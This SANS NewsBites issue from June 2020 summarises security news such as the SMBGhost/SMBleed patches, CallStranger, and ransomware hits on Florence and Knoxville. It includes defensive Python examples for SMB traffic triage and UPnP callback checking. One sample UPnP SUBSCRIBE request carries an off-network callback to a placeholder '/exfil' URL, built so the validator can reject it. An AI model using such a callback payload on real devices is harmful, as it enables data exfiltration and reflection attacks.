SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume XXII - Issue #47
June 12, 2020
Microsoft, Adobe, WordPress Issue Critical Patches -- Enterprises Falling Behind On Installing Them
****************************************************************************
SANS NewsBites June 12, 2020 Vol. 22, Num. 047
****************************************************************************
TOP OF THE NEWS
Microsoft Patch Tuesday
Microsoft Releases Fix for Vulnerability in Windows Group Policy
Adobe Releases Fixes for Flaws in Multiple Products
WordPress 5.4.2 Patches More Vulnerabilities
REST OF THE NEWS
Alabama City Says it Will Pay US $300,000 Ransomware Demand
Citizen Lab Says Dark Basin Hacking-for-Hire Group Has Ties to Indian Company
A1 Telekom (Austria) Breach
Cryptominer Campaign Targets Misconfigured Kubeflow Toolkit
Updated Specification Available for Universal Plug-and-Play Protocol Vulnerability
Senate Report: Chinese Telecoms Were Allowed to Operate in US with Minimal Oversight
US Military and Federal Law Enforcement Agencies Have Purchased New IMSI-Catchers
Knoxville City Systems Hit With Ransomware Attack
INTERNET STORM CENTER TECH CORNER
****************** Sponsored By Amazon Web Services, Inc. *******************
June 18, 2020 @ 2:00 EDT | Join Sounil Yu and AWS Marketplace to learn how you can better understand your sensitive data, including its location, configuration, and access privileges. Having the ability to identify and secure sensitive workloads through visibility layers and controls helps strengthen that understanding as well as your overall security posture. | http://www.sans.org/info/216685
*****************************************************************************
CYBERSECURITY TRAINING UPDATE
SANS Training is 100% Online, with two convenient ways to complete a course:
OnDemand | Live Online
- https://www.sans.org/ondemand/
- https://www.sans.org/live-online
Keep your skills sharp with SANS Online Training:
The world's top cybersecurity courses
Taught by real-world practitioners
Ideal preparation for more than 30 GIAC Certifications
Take advantage of the current promotional offer
Get a Free GIAC Certification Attempt or Take $350 Off with OnDemand or Live Online Training through June 24
https://www.sans.org/online-security-training/specials/
Top OnDemand Courses
SEC401: Security Essentials Bootcamp Style
- https://www.sans.org/ondemand/course/security-essentials-bootcamp-style
SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling
- https://www.sans.org/ondemand/course/hacker-techniques-exploits-incident-handling
SEC560: Network Penetration Testing and Ethical Hacking
- https://www.sans.org/ondemand/course/network-penetration-testing-ethical-hacking
______________________
Upcoming In Person and Live Online Events:
2-Day Firehose Training | June 29-30 | Live Online
- https://www.sans.org/event/2-day-firehose-training-jun29-2020
SANS Summer of Cyber | July 6-17 | Live Online
- https://www.sans.org/event/summer-of-cyber-jul-6
DFIR Summit & Training | July 16-25 | Live Online
- https://www.sans.org/event/digital-forensics-summit-2020
SANS Network Security 2020 | September 20-25 | Las Vegas, NV or Live Online
- https://www.sans.org/event/network-security-2020
______________________
Test drive a course: https://www.sans.org/course-preview
View the full SANS course catalog and skills roadmap.
- https://www.sans.org/courses
- https://www.sans.org/cyber-security-skills-roadmap
*****************************************************************************
TOP OF THE NEWS
--Microsoft Patch Tuesday
(June 9 & 10, 2020)
On Tuesday, June 9, Microsoft released fixes for 129 security issues across multiple products. This is the fourth month in a row that Microsoft's scheduled security update has addressed more than 100 vulnerabilities. The patches include a fix for a critical remote code execution vulnerability in the Server Message Block version 1 (SMBv1) protocol (CVE-2020-1301), as well as fixes for two vulnerabilities in SMBv3: a kernel memory information disclosure flaw (CVE-2020-1206, "SMBleed") and a denial-of-service flaw (CVE-2020-1284).
[Editor Comments]
[Pescatore] In the current environment, two important points: (1) The NewsBites item last week about Rapid7 discovering over 80% of Microsoft Exchange servers had not installed a February critical patch indicates that IT operations may not be focusing on server patching while IT staff is working from home, and (2) Employees working at home from their own PCs should be reminded to make sure auto update is on and that these mega-patch releases are being successfully installed.
[Ullrich] Microsoft moved away from SMBv1 and introduced SMBv2 to reduce some of the attack surface created by many no-longer-used legacy features. In SMBv3, Microsoft started adding features like compression but apparently didn't learn from past mistakes and ended up with now three vulnerabilities that can be devastating if combined. In the end, the old rule still applies: Never allow SMB to pass your perimeter, and closely monitor SMB traffic internally. In March, we had SMBGhost (CVE-2020-0796). SMBGhost is a remote code execution vulnerability, but it is difficult to exploit, and it took until May for a working PoC exploit to be released publicly. This month, Microsoft patched another vulnerability in the exact same feature of SMBv3. SMBleed (CVE-2020-1206) sounds less severe at first, only allowing for information disclosure. But the information disclosed is Kernel memory, and paired with SMBGhost for privilege escalation, SMBleed can lead to devastating attacks. And finally, yes, we got another RCE in SMBv1 (SMBLost, CVE-2020-1301). But SMBv1 should have been disabled a long time ago.
[Neely] On the heels of making sure the patch for SMBGhost was applied, MS releases additional SMB fixes. While SMB is contained within the traditional corporate perimeter, the current work environment may not be as well contained, so timely patching is essential. As John reminds us, our environment is further complicated by personally owned systems which also need to be kept updated. Where possible, incorporate patch checking into your VPN posture check. Be sure to let users know the enforcement timeline and expectations around attempted use of an unpatched system.
[Murray] For the moment and for most enterprises "patching" remains mandatory; failing to do so not only puts one at risk but puts one's neighbors at risk. At what point do we decide that the cost of patching is too high? When do we realize that the attack surface of these widely used products is so big, so homogenous, and so porous, that collectively they weaken the entire infrastructure? When do we realize that the architectures (e.g., von Neumann), languages, and development processes that we are using are fundamentally flawed? That hiding these products behind local firewalls and end-to-end application layer encryption is a more efficient strategy? When do we acknowledge that we must fundamentally reform how we build, buy, pay for, and use both hardware and software? At what point do we admit that we cannot patch our way to security?
Read more in:
SANS: Microsoft June 2020 Patch Tuesday
https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/
KrebsOnSecurity: Microsoft Patch Tuesday, June 2020 Edition
https://krebsonsecurity.com/2020/06/microsoft-patch-tuesday-june-2020-edition/
The Register: June's Patch Tuesday reveals 23 ways to remotely pwn Windows, and over 100 more bugs that could ruin your day
https://www.theregister.com/2020/06/09/june_2020_patch_tuesday/
ZDNet: Microsoft June 2020 Patch Tuesday fixes 129 vulnerabilities
https://www.zdnet.com/article/microsoft-june-2020-patch-tuesday-fixes-129-vulnerabilities/
Dark Reading: Microsoft Fixes 129 Bugs in Largest Patch Tuesday Release
DUO: Critical Flaw Patched in Windows SMB
https://duo.com/decipher/critical-flaw-patched-in-windows-smb
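The SMBv3 flaws discussed above (SMBGhost, SMBleed) both live in the SMB 3.1.1 compression feature, and the SMBv1 bug only matters where SMBv1 is still enabled; both conditions are visible on the wire in the very first packet a client sends. The following is an added example for this item, not code from SANS, Microsoft or the ISC: it parses an SMB2 NEGOTIATE request (and recognises an SMBv1 one) and reports whether the client still speaks SMBv1 or advertises compression, which is how you would triage internal SMB traffic from a capture or a sensor. The field layouts follow MS-SMB2 (header, NEGOTIATE request, negotiate contexts, compression capabilities); the sample requests are constructed by the builder in the block, not real captures, and the client GUID and salt values are placeholders.

```python
"""Spot SMB clients that still negotiate SMBv1 or advertise SMB 3.1.1 compression,
the feature behind SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206).

Added example for this NewsBites item; not code from SANS, Microsoft or the ISC.
Field layouts follow MS-SMB2 2.2.1 (header), 2.2.3 (NEGOTIATE request),
2.2.3.1 (negotiate contexts) and 2.2.3.1.3 (compression capabilities); the
framing is the 4-byte NetBIOS session header used on TCP/445.
"""
import struct
import uuid

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001
CTX_COMPRESSION = 0x0003
COMPRESSION_NAMES = {0x0000: "NONE", 0x0001: "LZNT1", 0x0002: "LZ77",
                     0x0003: "LZ77+Huffman", 0x0004: "Pattern_V1"}


def build_negotiate(dialects, compression_algs=(), client_guid=None):
    """Build a NetBIOS-framed SMB2 NEGOTIATE request (constructed test input, not a capture)."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, SMB2_NEGOTIATE,
                                      1, 0, 0, 0, 0, 0, 0, b"\x00" * 16)
    guid = (client_guid or uuid.UUID(int=0)).bytes_le  # placeholder ClientGuid
    fixed = struct.pack("<HHHHI16s", 36, len(dialects), 0x0001, 0, 0, guid)
    dialect_bytes = struct.pack("<%dH" % len(dialects), *dialects)
    ctx_list = []
    if DIALECT_311 in dialects:
        # SMB 3.1.1 requires a pre-authentication integrity context (SHA-512, 32-byte salt).
        ctx_list.append((CTX_PREAUTH_INTEGRITY,
                         struct.pack("<HHH", 1, 32, 0x0001) + b"\x11" * 32))
        if compression_algs:
            ctx_list.append((CTX_COMPRESSION,
                             struct.pack("<HHI", len(compression_algs), 0, 0)
                             + struct.pack("<%dH" % len(compression_algs), *compression_algs)))
        ctx_offset = 64 + len(fixed) + 8 + len(dialect_bytes)  # measured from the SMB2 header
        pad = (-ctx_offset) % 8                                 # contexts are 8-byte aligned
        fixed += struct.pack("<IHH", ctx_offset + pad, len(ctx_list), 0)
    else:
        pad = 0
        fixed += struct.pack("<Q", 0)  # ClientStartTime field used by pre-3.1.1 dialects
    blob = b""
    for ctype, data in ctx_list:
        blob += b"\x00" * ((-len(blob)) % 8)  # re-align before every context after the first
        blob += struct.pack("<HHI", ctype, len(data), 0) + data
    msg = header + fixed + dialect_bytes + b"\x00" * pad + blob
    return struct.pack(">I", len(msg)) + msg  # NetBIOS: 0x00 type byte + 24-bit length


def parse_negotiate(frame):
    """Return (protocol, dialects, {context_type: data}) for one framed NEGOTIATE request."""
    if len(frame) < 8 or frame[0] != 0:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(frame[1:4], "big")
    msg = frame[4:4 + length]
    if msg[:4] == SMB1_MAGIC:
        return "SMB1", [], {}  # SMBv1 NEGOTIATE carries dialect strings; not parsed here
    if msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB message")
    (command,) = struct.unpack_from("<H", msg, 12)
    if command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE request")
    size, dialect_count = struct.unpack_from("<HH", msg, 64)
    if size != 36:
        raise ValueError("bad NEGOTIATE StructureSize")
    dialects = list(struct.unpack_from("<%dH" % dialect_count, msg, 100))
    contexts = {}
    if DIALECT_311 in dialects:
        off, count = struct.unpack_from("<IH", msg, 92)
        for _ in range(count):
            ctype, dlen = struct.unpack_from("<HH", msg, off)
            contexts[ctype] = msg[off + 8:off + 8 + dlen]
            off += (8 + dlen + 7) & ~7  # advance to the next 8-byte boundary
    return "SMB2", dialects, contexts


def compression_algorithms(contexts):
    """Algorithms advertised in the SMB2_COMPRESSION_CAPABILITIES context (empty if absent)."""
    data = contexts.get(CTX_COMPRESSION)
    if data is None:
        return []
    (count,) = struct.unpack_from("<H", data, 0)  # CompressionAlgorithmCount; Padding and Flags follow
    return list(struct.unpack_from("<%dH" % count, data, 8))


def assess(frame):
    """Classify one NEGOTIATE request for monitoring: legacy SMBv1, or SMB 3.1.1 with compression."""
    protocol, dialects, contexts = parse_negotiate(frame)
    algs = [a for a in compression_algorithms(contexts) if a != 0x0000]
    if protocol == "SMB1":
        verdict = "SMBv1 NEGOTIATE: legacy dialect still enabled on the client"
    elif algs:
        verdict = "SMB 3.1.1 compression offered: confirm SMBGhost/SMBleed patches or DisableCompression"
    else:
        verdict = "no SMBv1 and no compression offered"
    return {"protocol": protocol, "smb311": DIALECT_311 in dialects,
            "compression": [COMPRESSION_NAMES.get(a, hex(a)) for a in algs], "verdict": verdict}


if __name__ == "__main__":
    sample = build_negotiate([0x0202, 0x0210, 0x0300, 0x0302, 0x0311], compression_algs=(1, 2, 3))
    print(assess(sample))
    print(assess(b"\x00\x00\x00\x04" + SMB1_MAGIC))
```

Feed `assess()` the first client-to-server payload of each TCP/445 session; a client that offers LZNT1/LZ77/Pattern_V1 in its NEGOTIATE has compression enabled and is worth checking for the March and June patches (or the DisableCompression workaround), and any session that opens with an SMBv1 header identifies a host where SMBv1 was never turned off.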
--Microsoft Releases Fix for Vulnerability in Windows Group Policy
(June 9 & 10, 2020)
One of the issues Microsoft patched in its scheduled monthly security update is a privilege elevation flaw in Windows Group Policy. CyberArk discovered the vulnerability and notified Microsoft more than a year ago; the issue affects all currently supported versions of Windows.
[Editor Comments]
[Neely] The fix to CVE-2020-1317 is included in this month's patches from Microsoft. CyberArk characterized this vulnerability as easy to exploit once logged into the system; Microsoft claims specialized software is also needed. Either way, applying this month's update solves the problem.
Read more in:
CyberArk: Group Policies Going Rogue
https://www.cyberark.com/resources/threat-research-blog/group-policies-going-rogue
ZDNet: Windows 10: Microsoft patches 'important' Windows Group Policy bug reported a year ago
Bleeping Computer: Windows Group Policy flaw lets attackers gain admin privileges
--Adobe Releases Fixes for Flaws in Multiple Products
(June 9, 2020)
Adobe has released fixes for security issues in Flash Player, Experience Manager, and Framemaker. In all, the updates address 10 vulnerabilities. Four of the vulnerabilities are rated critical; they could be exploited to remotely execute code on unpatched systems. Three of the critical flaws, memory corruption and out-of-bounds write vulnerabilities, affect Framemaker; the fourth, a use after free vulnerability, affects Flash Player.
[Editor Comments]
[Pescatore] Another one to remind work-at-home employees to patch, with an additional caveat: Adobe and McAfee continue to try to persuade Adobe software users to install McAfee software as part of the Adobe patching process. Users should be told explicitly to not just click yes on Adobe update requests. Hard to believe this Adobe/McAfee deal continues. Imagine if Band-Aid tried to trick users into signing up for home alarm services.
[Neely] I still get an occasional prompt to enable Flash to view content, so I just checked: the Flash end-of-life date is still December 31, 2020, so you need to keep it updated where it's still being used. Make sure that the plans to retire Flash-based content, or provide an isolated browser for using it, are still completing this year.
Read more in:
Threatpost: Adobe Warns of Critical Flaws in Flash Player, Framemaker
https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/
Bleeping Computer: Adobe fixes critical remote code execution bug in Flash Player
Adobe: Adobe Security Bulletins and Advisories
https://helpx.adobe.com/security.html
--WordPress 5.4.2 Patches More Vulnerabilities
(June 11, 2020)
WordPress has released version 5.4.2 of its content management system. The security and maintenance release addresses six security issues affecting WordPress 5.4 and earlier, several of them cross-site scripting (XSS) vulnerabilities; sites that support automatic background updates receive it without administrator action. WordPress plans to release its next major version, WordPress 5.5, in August 2020.
Read more in:
Portswigger: WordPress security release addresses multiple XSS vulnerabilities
https://portswigger.net/daily-swig/wordpress-security-release-addresses-multiple-xss-vulnerabilities
WordPress: WordPress 5.4.2 Security and Maintenance Release
https://wordpress.org/news/2020/06/wordpress-5-4-2-security-and-maintenance-release/
**************************** SPONSORED LINKS ******************************
1) SANS Survey | Survey closes on June 24th. Share your perception of the use of firewalls inside the modern enterprise and how your organization is using firewalls: http://www.sans.org/info/216690
2) Digital Forensics Solutions Forum | July 17, 2020 @ 9:00 am EDT | SANS is convening an inaugural forum for DFIR solutions featuring case studies from vetted solution providers who support investigations across a wide range of scenarios: http://www.sans.org/info/216695
3) Webcast | Join Tim Conway, Peter Newton and Christopher Blauvelt as they discuss how to use "NERC CIP: An Overview of the Standards" | June 18, 2020 @ 10:30am EDT | http://www.sans.org/info/216700
*****************************************************************************
THE REST OF THE WEEK'S NEWS
--Alabama City Says it Will Pay US $300,000 Ransomware Demand
(June 9 & 11, 2020)
The city of Florence, Alabama plans to pay nearly $300,000 in bitcoin to ransomware operators to prevent citizens' data from being exposed. On May 26, Brian Krebs called the mayor's office to let them know that ransomware operators had gained a foothold in the city's systems. On Friday, June 5, the city's mayor acknowledged that the city email system had been shut down due to a cyberattack, and earlier this week the mayor confirmed to Krebs that Florence's systems had been infected with DoppelPaymer ransomware. The Florence city council unanimously approved the decision to pay the ransom.
[Editor Comments]
[Neely] With ransomware operators offering purloined information for sale reminiscent of an eBay auction, it's a good time to revisit your decision process regarding ransom payment as well as making sure you know what information resides in which locations so you can characterize affected data and respond appropriately if necessary.
[Murray] Three years in, all municipalities and healthcare institutions are responsible for knowing that they are targets of extortion attacks and for having a plan for resisting and mitigating such attacks. While paying ransom may, in at least some cases, be an appropriate part of such a plan, such a plan must have been made in advance of the attack, not simply as a convenient and expensive response to it.
Read more in:
KrebsOnSecurity: Florence, Ala. Hit By Ransomware 12 Days After Being Alerted by KrebsOnSecurity
APR: Alabama city to pay $300,000 ransom in computer system hack
https://www.apr.org/post/alabama-city-pay-300000-ransom-computer-system-hack
--Citizen Lab Says Dark Basin Hacking-for-Hire Group Has Ties to Indian Company
(June 9, 2020)
Researchers with the Citizen Lab Internet watchdog group say that a hacking-for-hire group it has dubbed Dark Basin has ties to BellTroX InfoTech Services, a company based in India. Dark Basin has targeted thousands of people and organizations around the world over the past seven years. Dark Basin's targets include journalists, nonprofits, advocacy groups, and commercial organizations.
Read more in:
Citizen Lab: Dark Basin | Uncovering a Massive Hack-For-Hire Operation
https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/
Reuters: Exclusive: Obscure Indian cyber firm spied on politicians, investors worldwide
Dark Reading: Hack-for-Hire Firm Connected to Attacks on Nonprofits, Journalists
Ars Technica: Hackers for hire targeted hundreds of institutions, says report
The Register: Researchers unmask Indian 'infosec' firm to reveal hacker-for-hire op that targeted pretty much anyone clients wanted
https://www.theregister.com/2020/06/09/citizen_lab_indian_hackers/
Threatpost: Dark Basin Hack-For-Hire Group Targeted Thousands Over 7 Years
https://threatpost.com/dark-basin-hack-hire-group/156407/
Cyberscoop: Vast hack-for-hire scheme against activists, corporate targets tied to Indian IT firm
https://www.cyberscoop.com/dark-basin-citizen-lab-belltrox-exxon-mobile-hacking/
--A1 Telekom (Austria) Breach
(June 8 & 11, 2020)
A1 Telekom, Austria's largest Internet service provider, has acknowledged a security breach that began in November 2019. The company says it detected the intrusion in December 2019, but that it took until May 22, 2020 to fully evict the attackers and mitigate the situation. All employee passwords have been reset, as have passwords and access keys for all servers.
Read more in:
ZDNet: Hackers breached A1 Telekom, Austria's largest ISP
https://www.zdnet.com/article/hackers-breached-a1-telekom-austrias-largest-isp/
Heise: Massive attack on A1 Telekom Austria (German)
https://www.heise.de/hintergrund/Massiver-Angriff-auf-A1-Telekom-Austria-4775451.html
--Cryptominer Campaign Targets Misconfigured Kubeflow Toolkit
(June 10 & 11, 2020)
Microsoft's Azure Security Center recently detected a cryptomining campaign targeting misconfigured Kubeflow deployments on Kubernetes. Kubeflow's dashboard is reachable only from inside the cluster by default; users who changed the Istio ingress gateway setting to expose it externally left the dashboard open to anyone on the Internet. The attackers appear to have been scanning for such instances and using the dashboard to deploy containers that mine Monero. Administrators should check whether the Istio ingress gateway service for Kubeflow has an external address and, if so, revert it to an internal type and review recently created pods.
Read more in:
Microsoft: Misconfigured Kubeflow workloads are a security risk
Threatpost: Kubernetes Falls to Cryptomining via Machine-Learning Framework
https://threatpost.com/kubernetes-cryptomining-machine-learning-framework/156481/
ZDNet: Microsoft discovers cryptomining gang hijacking ML-focused Kubernetes clusters
--Updated Specification Available for Universal Plug-and-Play Protocol Vulnerability
(June 9 & 11 , 2020)
A flaw in the Universal Plug and Play (UPnP) protocol, tracked as CVE-2020-12695, could be exploited to launch distributed denial-of-service (DDoS) attacks, exfiltrate data, and scan internal ports. The problem is in the SUBSCRIBE function: a device sends event notifications to whatever URL the request's Callback header names, including destinations outside the local network. Dubbed CallStranger by the researcher who created proof-of-concept exploit code, the issue affects billions of Internet of Things (IoT) devices. The Open Connectivity Foundation has published an updated specification, but devices are only protected once vendors ship firmware that implements it.
[Editor Comments]
[Neely] Don't expose UPnP devices to the Internet. Know what UPnP devices you have and what they can access. Paul Asadoorian of Security Weekly gave me this reference on discovering UPnP devices on your network using Nmap or the miranda-upnp python package: https://charlesreid1.com/wiki/Nmap/UPnP.
Read more in:
DUO: Flaw in Plug-and-Play Protocol Exposes Devices to Data Theft, DDoS Attacks
https://duo.com/decipher/flaw-in-plug-and-play-protocol-exposes-devices-to-data-theft-ddos-attacks
Ars Technica: UPnP flaw exposes millions of network devices to attacks over the Internet
Dark Reading: Vulnerability in Plug-and-Play Protocol Puts Billions of Devices at Risk
CERT: Universal Plug and Play (UPnP) SUBSCRIBE can be abused to send traffic to arbitrary destinations
https://kb.cert.org/vuls/id/339275
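The two practical pieces of this item are an inventory of what answers SSDP discovery on your network, and the rule the updated specification imposes on SUBSCRIBE: callback URLs must stay on the device's own local network. The following is an added example, not code from SANS, the CallStranger researcher, or the Open Connectivity Foundation. It builds the M-SEARCH probe, parses the replies into an asset list, and applies the local-network callback check to raw SUBSCRIBE requests. The SSDP replies and SUBSCRIBE requests in the block are constructed samples, not captures; the device banners, addresses and the 203.0.113.9 exfiltration target are placeholders, and rejecting hostnames in callbacks (rather than resolving them) is this example's choice.

```python
"""UPnP inventory and the CallStranger (CVE-2020-12695) callback check.

Added example for this NewsBites item; not code from SANS, the CallStranger
researcher, or the Open Connectivity Foundation.  It parses the SSDP replies an
M-SEARCH produces and applies the rule the updated UPnP Device Architecture
calls for: a SUBSCRIBE request's Callback URLs must point into the device's own
local network, never to an arbitrary host.
"""
import ipaddress
import re
import socket
from urllib.parse import urlsplit

SSDP_ADDR = ("239.255.255.250", 1900)

# Constructed sample traffic (not real captures): two M-SEARCH replies and two SUBSCRIBE requests.
SAMPLE_REPLIES = [
    "HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nLOCATION: http://192.168.1.1:49152/rootDesc.xml\r\n"
    "SERVER: Linux/3.10 UPnP/1.1 MiniUPnPd/2.0\r\nST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "USN: uuid:aaaaaaaa-0000-0000-0000-000000000001::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n",
    "HTTP/1.1 200 OK\r\nLOCATION: http://192.168.1.20:8200/rootDesc.xml\r\n"
    "SERVER: Debian DLNADOC/1.50 UPnP/1.0 MiniDLNA/1.2\r\nST: urn:schemas-upnp-org:device:MediaServer:1\r\n"
    "USN: uuid:aaaaaaaa-0000-0000-0000-000000000002::urn:schemas-upnp-org:device:MediaServer:1\r\n\r\n",
]
SUBSCRIBE_LOCAL = ("SUBSCRIBE /evt/WANIPConn1 HTTP/1.1\r\nHOST: 192.168.1.1:49152\r\n"
                   "CALLBACK: <http://192.168.1.50:8080/notify>\r\nNT: upnp:event\r\nTIMEOUT: Second-1800\r\n\r\n")
# CallStranger pattern: one legitimate-looking callback plus an off-net one carrying data in the URL.
SUBSCRIBE_EVIL = ("SUBSCRIBE /evt/WANIPConn1 HTTP/1.1\r\nHOST: 192.168.1.1:49152\r\n"
                  "CALLBACK: <http://192.168.1.50:8080/notify><http://203.0.113.9/exfil?" + "A" * 32 + ">\r\n"
                  "NT: upnp:event\r\nTIMEOUT: Second-1800\r\n\r\n")


def build_msearch(st="ssdp:all", mx=2):
    """The multicast M-SEARCH that makes UPnP devices announce themselves."""
    return ("M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMAN: \"ssdp:discover\"\r\n"
            "MX: %d\r\nST: %s\r\n\r\n" % (mx, st)).encode()


def parse_headers(message):
    """Lower-cased header dict from an SSDP reply or SUBSCRIBE request; the request line is under 'start'."""
    start, _, rest = message.partition("\r\n")
    headers = {"start": start}
    for line in rest.split("\r\n"):
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def inventory(replies):
    """Map each responding device's IP (from LOCATION) to (SERVER banner, ST) for the asset list."""
    found = {}
    for text in replies:
        h = parse_headers(text)
        if not h["start"].startswith("HTTP/1.1 200"):
            continue
        host = urlsplit(h.get("location", "")).hostname
        if host:
            found[host] = (h.get("server", "?"), h.get("st", "?"))
    return found


def callback_urls(header_value):
    """CALLBACK carries one or more <url> tokens."""
    return re.findall(r"<([^>]+)>", header_value)


def callback_is_local(url, local_nets):
    """Accept only plain http:// URLs whose host is a literal IP inside one of the given CIDR networks.
    Rejecting hostnames instead of resolving them is this example's choice, not spec text."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return False
    return any(ip in ipaddress.ip_network(net) for net in local_nets)


def subscribe_allowed(request, local_nets):
    """The updated-spec rule: honour a SUBSCRIBE only if every callback URL stays on the local network."""
    h = parse_headers(request)
    if not h["start"].startswith("SUBSCRIBE ") or "callback" not in h:
        return False
    urls = callback_urls(h["callback"])
    return bool(urls) and all(callback_is_local(u, local_nets) for u in urls)


def discover(timeout=2.0):
    """Send an M-SEARCH and collect live replies (needs a network; the samples above do not use it)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), SSDP_ADDR)
    replies = []
    try:
        while True:
            data, _ = sock.recvfrom(65535)
            replies.append(data.decode(errors="replace"))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return replies


if __name__ == "__main__":
    lan = ["192.168.1.0/24"]
    for ip, (server, st) in inventory(SAMPLE_REPLIES).items():
        print(ip, server, st)
    print("local callback accepted:", subscribe_allowed(SUBSCRIBE_LOCAL, lan))
    print("off-net callback accepted:", subscribe_allowed(SUBSCRIBE_EVIL, lan))
```

Run `inventory(discover())` from a host on each VLAN to get the asset list Lee Neely asks for, and compare it against what your edge firewall can reach on UDP/1900 and the devices' event ports. The `subscribe_allowed` check is the behaviour to look for when testing a device against the updated specification: a patched device should refuse the second sample request outright, not merely fail to deliver to the off-net callback.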
--Senate Report: Chinese Telecoms Were Allowed to Operate in US with Minimal Oversight
(June 9, 2020)
A staff report from the US Senate's Permanent Subcommittee on Investigations found that the Federal Communications Commission (FCC) and other US agencies failed to adequately oversee Chinese government-owned telecommunications companies operating in the US for nearly 20 years. The report notes that the team of officials from the Departments of Justice, Homeland Security, and Defense (known as Team Telecom) who were supposed to monitor the Chinese-owned carriers had scant resources and no statutory authority.
[Editor Comments]
[Pescatore] Over this same time frame, back in 2003 British Telecom selected Huawei for the UK national network upgrade, and the British government dedicated resources to (and required Huawei to help fund) the Huawei Cyber Security Evaluation Centre to test all software and firmware from Huawei before allowing it on production systems. The UK has mitigated the risk successfully for 17 years with that supply chain security approach.
Read more in:
Senate: Portman, Carper: Bipartisan Report Reveals How Three Chinese Government-Owned Telecoms Operated in the U.S. for Nearly 20 Years with Little-to-No Oversight from the Federal Government
HSGAC: Threats to U.S. Networks: Oversight of Chinese Government-Owned Carriers (PDF)
Ars Technica: FCC failed to monitor Chinese telecoms for almost 20 years: Senate report
Cyberscoop: Shoddy US government review of Chinese telcos endangered national security, Senate panel finds
https://www.cyberscoop.com/chinese-telecommunications-national-security-team-telecom-senate/
FNN: Investigation finds interagency group lacked authority to oversee Chinese telecom companies
GovInfosecurity: Senate Report: Chinese Telecoms Operated Without Oversight
https://www.govinfosecurity.com/senate-report-chinese-telecoms-operated-without-oversight-a-14409
--US Military and Federal Law Enforcement Agencies Have Purchased New IMSI-Catchers
(May 27 & June 8, 2020)
The American Civil Liberties Union (ACLU) has obtained documents under the Freedom of Information Act (FOIA) showing that US Immigration and Customs Enforcement (ICE) purchased upgraded IMSI-catcher devices known as Crossbows. The technology, made by the same company that makes the Stingray IMSI-catcher (Harris Corporation, now L3Harris), appears to target 4G (LTE) mobile devices. Motherboard found that other US military and federal law enforcement agencies have also purchased Crossbows.
Read more in:
Vice: Agencies Spending Millions on 'Crossbow' Spy Tech, an Upgraded Stingray
https://www.vice.com/en_us/article/jgxm3g/crossbow-imsi-catcher-new-stingray
ACLU: ICE Records Confirm that Immigration Enforcement Agencies are Using Invasive Cell Phone Surveillance Devices
--Knoxville City Systems Hit With Ransomware Attack
(June 11, 2020)
The city of Knoxville, Tennessee, was the target of a ransomware attack this week. The city has shut down its IT network. By the time the attack was detected early in the morning of Thursday, June 11, multiple systems had been encrypted. Emergency services have not been impacted by the attack.
Read more in:
Ars Technica: Knoxville shuts down parts of its network after being hit by ransomware
ZDNet: Knoxville shuts down IT network following ransomware attack
https://www.zdnet.com/article/knoxville-shuts-down-it-network-following-ransomware-attack/
SC Magazine: Knoxville ransomware attack shutters parts of city website
*****************************************************************************
INTERNET STORM CENTER TECH CORNER
Microsoft Patch Day
https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/
SMBleed
https://github.com/ZecOps/CVE-2020-1206-POC
Anti-Debugging JavaScript Techniques
https://isc.sans.edu/forums/diary/AntiDebugging+JavaScript+Techniques/26228/
Job Application Themed Malspam Pushes ZLoader
https://isc.sans.edu/forums/diary/Job+applicationthemed+malspam+pushes+ZLoader/26222/
Adobe Patches
https://helpx.adobe.com/security.html
Intel Patch Day
More Expiring Root CAs
https://scotthelme.co.uk/impending-doom-root-ca-expiring-legacy-clients/
Black Lives Matter Themed Malware
Facebook Messenger Desktop App Vulnerability
https://blog.reasonsecurity.com/2020/06/11/persistence-method-using-facebook-messenger-desktop-app/
Outlook Massmailing Macros
https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
STI Student Research: Dennis Taggard; Ebb and Flow: Network Flow Logging as a Staple of Public Cloud Visibility or a Waning Imperative?
Video: https://youtu.be/faoFx7Q3_aM
*****************************************************************************
The Editorial Board of SANS NewsBites
John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.
Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.
Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.
Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.
Mark Weatherford is Global Information Security Strategist for Booking Holdings and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.
